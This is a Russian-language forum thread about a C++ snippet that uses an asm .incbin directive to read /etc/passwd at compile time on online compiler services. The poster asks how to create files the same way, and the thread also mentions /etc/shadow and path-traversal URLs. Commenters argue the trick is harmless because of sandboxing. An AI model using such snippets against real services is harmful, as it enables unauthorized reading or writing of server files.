# Exploit под Online IDE компиляторы на C++

Tags: c++

Всем привет)

Может быть некоторые знают такие, например compileonline.com

Вообщем остается один вопрос, защищенность данных сервисов.

Впрочем, все в округ да около.

Есть данный эксплойт:

```
#include <stdio.h>

extern "C"

asm(
    ".global _data\n"
    ".data\n"
    "_data:\n"
    ".incbin \"/etc/passwd\"\n"
    ".byte 0"
);

extern const char _data;
const char* data = &_data;

int main() {
   printf("%s", data);
}
```

Тут во время компиляции вызывается ассемблерная функция incbin, которая в свою очередь на момент компиляции запускает либо читает сторонний файл, в данном эксплойте происходит чтение файла etc/passwd.

Для того, что бы эксплуатировать уязвимость, необходимо в любом онлайн компиляторе скомпилировать выше показанный код под языком C++

А теперь вопрос: вот хотелось бы узнать, есть ли эквивалент данной ассемблерной функции, только не читающий, а создающий определенные файлы?

Comment: Ох, и правда работает.

Comment: - Штука прикольная, но практической пользы немного.

- С помощью такой штуки можно проэксплуатировать разве что сервис, который компилирует код под `root'`ом, при [этом прочитав не `/etc/passwd,` а `/etc/shadow.`](http://serverfault.com/questions/286654/ordinary-users-are-able-to-read-etc-passwd-is-this-a-security-hole) Понятно, что в нормальных системах компиляция и запуск бинарников будет осуществляться в специальном `sandbox'е` или как минимум под `dedicated restricted` пользователем.

Comment: Ты написал "запускает скомпилированный код". Самое интересное, то что почти на всех сервисах компиляция идет от root`а, а во время компиляции при обнаружении функции incbin происходит чтение файла, то есть код не надо даже запускать, он уже прочитает файл на момент компиляции.

Comment: @Nu11ers3t

- Тем не менее, это не отменяет аргумента про `sandbox'ы,` в которых это все происходит. Еще мне кажется очень сомнительным, что компиляция на каком-либо из подобных сервисов происходит из под `root'a.` Ну то есть, какой вообще в этом смысл?

Comment: А ты попробуй, я еще не замечал таких проектов, где эксплойт не прочитал бы etc/passwd

Comment: @Nu11ers3t

- Еще раз, [читать `/etc/passwd` может любой пользователь,](http://serverfault.com/questions/286654/ordinary-users-are-able-to-read-etc-passwd-is-this-a-security-hole) и никакого "эксплоита" здесь нет. Вы попробуйте прочитать, например, `/etc/shadow`, `/etc/master.passwd` или `/etc/security/passwd`.

Comment: Любой? Да конечно. Попробуй прочти например:

http://hashcode.ru/etc/passwd
или
http://hashcode.ru/../../../../../etc/passwd

Comment: @Nu11ers3t

- Я искренне надеюсь, что вы все-таки троллите. Если нет, то рекомендую завязать с чтением журналов "Хакер" 2000-ого года выпуска `:)`

Comment: ассемблерная функция? это конечно жесть. а откуда она там берется?

Comment: @Nu11ers3t, а Вы, собственно, опасаетесь, что какой-то "шутник" завалит такой сервис?

И где Вы рута нашли? Я попробовал по Вашей ссылке, набросал пару программок

    Compiling the source code....
    $gcc main.c -o demo -lm -pthread -lgmp -lreadline 2>&1
    
    Executing the program....
    $demo
    
    uid: 48  euid: 48
    End

Чтение /etc/passwd показало

    apache:x:48:48:Apache:/var/www:/sbin/nologin


Кстати, объем вывода ограничен (du / до конца не дошла).

--

Где-то на эту тему я читал, что какой-то из организаторов подобного сервера обещал награду каждому, кто его сломает.

Comment: @avp: это с [Хабра](http://habrahabr.ru/post/183976/). Песочница, никакой проблемы нету. Отбой воздушной тревоги.

Comment: Если честно не понял, с чего вдруг asm код исполняется во время компиляции?

Comment: На ideone можно просто открыть "/etc/passwd", без всяких заморочек с ассемблером http://ideone.com/AuZz8y